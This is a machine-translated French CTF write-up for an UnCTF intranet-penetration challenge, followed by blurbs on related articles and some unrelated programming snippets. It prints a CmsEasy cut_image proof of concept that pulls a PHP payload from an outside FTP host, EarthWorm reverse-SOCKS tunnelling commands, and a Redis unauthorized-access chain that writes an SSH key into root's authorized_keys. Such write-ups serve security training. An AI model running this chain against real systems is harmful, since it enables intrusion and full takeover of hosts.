UnCTFPénétration de l'intranet

Titre:www.whalwl.site:8021

Table des matières


cmseasy

Jetez un coup d'oeil à l'architecture du site

Apache/2.4.7 (Ubuntu)

PHP/5.5.9

CmsEasyVersion5_6_0_20160825_UTF8

Trouver une vulnérabilité dans l'historique du programme,J'ai trouvé une fuite à haut risque “CmsEasy cut_image Vulnérabilité à l'exécution du Code

CmsEasyLa réception est illimitéeGetShell

GetshellInstructions supplémentaires pour

POC:

http://www.whalwl.site:8021/index.php?case=tool&act=cut_image
pic=1ftp://221.xxx.xx.xx/payload.php&w=400&h=300&x1=0&x2=400&y1=0&y2=300

Cliquez sur moi pour téléchargerPHPUn mot de passea


Pénétration transversale de l'intranet

  • SelonflagConseils, La deuxième partie manquante est dans l'intranet

  • Vérifiez l'intranet IP.Ensuite, utilisezLadon Scannez l'intranet :

    IntranetIP:192.168.128.2

  • LadonScanC Ports ouverts communs pour les hôtes de segment

    Ajouter des permissions d'exécution au fichier :

    chmod 777 Ladon64.lnx

    ./Ladon64.lnx 192.168.128.1/24 PortScan >1.txt

LadonGo 3.8 by k8gege
Arch: amd64 OS: linux
Pid: 1540 Process: Ladon64.lnx
Targe: 192.168.128.1/24 ScanStart: 2021-08-19 10:06:18
Load PortScan
192.168.128.3 22 Open SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
192.168.128.1 22 Open SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
192.168.128.2 80 Open HTTP/1.1 400 Bad Request Date: Thu, 19 Aug 2021 14:06:26 GMT Server: Apache/2.4.7 (Ubuntu) Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.128.2 Port 80</address>
</body></html>
192.168.128.3 6379 Open -ERR wrong number of arguments for 'get' command
Finished: 2021-08-19 10:06:28

Machine Intranet trouvée 192.168.128.3 Ouvert6379Le port estRedisServices.

  • Redis Vulnérabilité d'accès non autorisée

    Redis Par défaut, Sera lié à 0.0.0.0:6379, Si la certification n'est pas ouverte , Peut faire en sorte que n'importe quel utilisateur n'ait pas accès au serveur cible sans autorisation Redis Et lire Redis Données. L'attaquant a un accès non autorisé à Redis Peut être utilisé dans le cas de Redis Méthodes pertinentes pour, Peut réussir dans Redis Écrire une clé publique sur le serveur , Vous pouvez ensuite vous connecter directement au serveur cible en utilisant la clé privée correspondante .

  • Nous avons maintenant accès à une machine sur l'intranet de la cible . Une pénétration plus poussée de l'intranet est nécessaire , Pour l'instant, j'ai un réseau public Ubuntu, Un intranet Kali, Comment inverser Socks5Oui.Kali L'agent de trafic est entré dans l'intranet cible

    La réponse est d'utiliser EarthWorm Frp Attendez que ce genre de logiciel soit inversé Socks5Agents

J'utiliseEarthWorm

Sur le réseau public Ubuntu Exécutez la commande suivante :

./ew_for_linux64 -s rcsocks -l 10800 -e 10240 &

Surveillance des machines sur le réseau public 10800Et10240Port

La machine cible exécute les commandes suivantes :

./ew_for_linux64 -s rssocks -d 167.160.188.xx -e 10240

linuxAdoptionproxychainsParamètresSocks5 Accès par procuration au service intranet cible

vi /etc/proxychains.conf

Ajouter:socks5 167.160.188.xx 10800

Une fois la configuration terminée, vous pouvez utiliser quelque chose comme proxychains nmap 192.168.128.1 De cette façon nmap L'agent de trafic pour la numérisation de l'intranet cible , Les autres outils en ligne de commande sont identiques .

windowsPeut être utiliséProxifier

Il est maintenant possible d'accéder à la machine Intranet , On va utiliser Redis Vulnérabilité d'accès non autorisée pour l'accès à la cible .

Redis Réapparition d'une vulnérabilité d'accès non autorisée

RedisAccès non autorisé

Installationredis-cli
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/bin/

Exploitation des vulnérabilités:

[email protected]:~/tmp# ssh-keygen -t rsa
[email protected]:~/tmp# cd /root/.ssh/
[email protected]:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
[email protected]:~/.ssh# cat /root/.ssh/foo.txt | proxychains redis-cli -h 192.168.128.3 -x set crackit
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-167.160.188.217:10800-<><>-192.168.128.3:6379-<><>-OK
OK
[email protected]:~/.ssh# proxychains redis-cli -h 192.168.128.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-167.160.188.217:10800-<><>-192.168.128.3:6379-<><>-OK
192.168.128.3:6379> config set dir /root/.ssh/
OK
192.168.128.3:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.128.3:6379> config set dbfilename "authorized_keys"
OK
192.168.128.3:6379> save
OK
192.168.128.3:6379> exit
[email protected]:~/.ssh# proxychains ssh -i id_rsa [email protected]

Accèsflag

cmseasy&Pénétration de l'intranet WriteupAutre article Afghanistan

  1. Idées de test de pénétration de l'intranet -FREEBUF

    (Je l'ai.webshellQuand, Trouver un moyen d'obtenir l'information du système obtenir l'autorisation du système ) Un.. Par la routine webPénétration, J'ai déjà webshell. Ce qui est important ensuite, c'est de détecter l'information du système ,Droit de rétractation,Pourwindows Trouver un moyen d'ouvrir une connexion de bureau distante , ...

  2. Pénétration de l'intranet À propos deGPO

    Il y a beaucoup d'articles sur Internet sur la pénétration de l'intranet , Mais il semble que c'est un blog étranger ,Adresse du blog:www.harmj0y.net/blog, Après avoir lu, je vois que beaucoup de ces idées sont très bonnes . En faisant l'intranet , Parfois, la machine qui touche la cible ouvre le pare - feu , Toutes les bases de ports ...

  3. [Original]K8 Cscan 3.6 Grand scanner personnalisé de pénétration Intranet

    Préface: La collecte d'informations sur la pénétration de l'Intranet et de l'Extranet est essentielle , Plus l'information est recueillie, plus la pénétration est précise, plus le taux de réussite est élevé, mais le taux de réussite est également affecté par la vulnérabilité , La vulnérabilité est affectée par l'opportunité , La vitesse de balayage de l'intranet à grande échelle affecte directement le taux de réussite, la vulnérabilité et l'actualité 1-2Oh, mon Dieu., La numérisation de l'intranet ou de l'Extranet nécessite 1 ...

  4. [Original]K8 cping 3.0 Grand scanner de pénétration Intranet

    [Original]K8 Cscan Grand scanner personnalisé de pénétration Intranet https://www.cnblogs.com/k8gege/p/10519321.html CscanIntroduction: Qu'est - ce qu'un scanner personnalisé ? C'est aussi plug - in ,Mais...C ...

  5. [Code source]PythonSimplehttpServeur( Pénétration de l'intranet grand transfert de fichiers avec commande de téléchargement )

    PythonSimplehttp Code source du serveur import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

  6. [Original]K8 Un couteau volant. 20150725 SoutienSOCKS5Agents(Pénétration de l'intranet)

    Outils: K8 Compilation de Flying knife :  Vérifiez vous - même le tissu de la coquille : K8 Putain de brigade de base [K8team]Auteur: K8 Le blog du frère ben Laden : http://qqhack8.blog.163.comPublication: 2015/7/26 3:41:11 Introduction: ...

  7. MSF Notes sur la pénétration de l'intranet

    EntréemeterpreterMode InmeterpreterEntrezshell Vous pouvez accéder à CMD La fenêtre peut alors être exécutée CMDLes ordres,Par exemple, ouvrirRDPServicesREG ADD HKLM\SYSTEM\CurrentControl ...

  8. metasploit Notes d'essai de pénétration ( Pénétration de l'intranet )

    x01 reverse the shell File La pratique habituelle est d'utiliser msfpayloadGénérer unbackdoor.exe Puis téléchargé sur la machine cible pour l'exécution . Écouter localement pour obtenir meterpreter shell. r ...

  9. Pénétration de l'intranet IPC, Exécution à distance

    Démarrer le service net start Schedule net start wmiApSrv Désactiver le pare - feu net stop sharedaccess net use \\ObjectifsIP\ipc$ "&qu ...

  10. Metasploit Pénétration de l'intranet

    0x01 reverse the shell File La pratique habituelle est d'utiliser msfpayloadGénérer unbackdoor.exe Puis téléchargé sur la machine cible pour l'exécution . Écouter localement pour obtenir meterpreter shell. ...

Recommandation aléatoire

  1. sublime text3 UtiliserSVNPlug - in

    Simon Souvent utilisé dans les projets SVN, Chaque fois que vous changez de soumission ,C'est gênant.,Avec çaSVN Le plugin est pratique , Soumettre par raccourci ,Mise à jour. Installation: Ctrl + Shift + P Appelé Sublime TextOutils de gestion de paquets pour ...

  2. GridViewMise en page, Adaptateur personnalisé , Défilement horizontal

    AjouterGridItemMise en pageXMLDocumentation <?xml version="1.0" encoding="utf-8"?> <LinearLayout ...

  3. DLL Erreur de déclaration du projet :fatal error lnk1104: cannot open file &quot;...\xxx.dll&quot;

    En générant DLL Pour signaler cette erreur , Impossible de générer DLL Vérifier la génération DLL Y a - t - il d'autres programmes qui utilisent le chemin de ... Ou éteignez le logiciel antivirus et essayez ...

  4. NGUI3.5 Série de tutoriels UILabel

    Ici.NGUILa version est:3.5.1 NGUI DeUILabel La zone de texte sous le script peut être utilisée avec BBCodeParamètres:[b]Bold[/b] En gras [i]italic[/i] Italique [u]underline[/u]Soulignement [ ...

  5. SqlServer Deux façons de garder quelques décimales

    SqlServer Deux façons de garder quelques décimales   Dans la base de données float momey Type, Est exacte à plusieurs décimales .Mais parfois, Nous n'avons pas besoin d'être aussi précis ,Par exemple, Précision à deux chiffres seulement . Résolution: 1. Utiliser Round( ...

  6. atomPlug - in

    1.Sync Settings Collocationgithub, Synchronisez vos atom Informations sur le plugin ,Informations de configuration, Vous permet de configurer facilement un ordinateur , Partage de plusieurs ordinateurs . 2.Emmet Peut être basé sur Emmet Syntaxe générée HTML, Non, non, non, non, non ...

  7. CS Academy Sliding Product Sum( Nombre de combinaisons )

    Titre Il y a un long \(N\) Séquence de \(A = [1, 2, 3, \dots, N]\) , Trouvez toutes les longueurs \(\le K\) Somme des produits de poids des sous - chaînes de ,Pour \(M\) Prendre le moule. \(N \le 10^{18 ...

  8. Python hasattr() Fonctions // pythonMoyennehasattr()、getattr()、setattr()Utilisation des fonctions

    http://www.runoob.com/python/python-func-hasattr.html https://www.cnblogs.com/zanjiahaoge666/p/74752 ...

  9. linux Question avec parenthèses anglaises pour les noms de fichiers dans

    Le nom du fichier contient “()”Documents,Entrée“(“ Appuie derrière. TAB La clé ne peut pas être complétée , Le nom complet du fichier entré manuellement ne peut pas non plus être supprimé :Conseilsbash: syntax error near unexpected token `('Erreur. InlinuxMoyenne ...

  10. T-SQL Déclaration de contrôle logique ifelse while casewhen

    ifelse, Si l'énoncé logique comporte plus d'une ligne ,Avecbegin end Le paquet use StudentManageDB go -- Résultats de la recherche declare @cAvg int select @cAvg=avg(CSha ...